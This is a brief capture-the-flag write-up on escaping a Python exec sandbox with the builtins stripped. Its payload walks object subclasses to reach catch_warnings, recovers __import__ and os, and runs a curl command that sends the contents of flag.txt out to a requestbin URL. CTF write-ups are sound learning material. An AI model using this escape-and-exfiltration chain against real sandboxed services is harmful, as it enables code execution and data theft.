(full writeup at link)

see that the line `env = {'__builtins__': {}}` removes all builtins when our code is executed in that environment:
```py
to_compile = f'async def func():\n{textwrap.indent(body, " ")}'
try:
exec(to_compile, env)
```

Use `().__class__.__bases__[0].__subclasses__()` to get list of all classes still available
import catch_warnings, and import os. Then send flag as a cookie to requestbin
(alternatively you could just import something that opens the file, and return that)

```py
a = [i for i in ().__class__.__bases__[0].__subclasses__() if i.__name__ == "catch_warnings"][0]
b = a()._module.__builtins__
c = b['__import__']('os')
c.system('curl -X POST -d "flag=$(cat flag.txt)" http://requestbin.net/r/REQUEST')
```

Original writeup (https://nullpxl.com/post/hsctf6-jsoninfo-keithbot-alostcause/).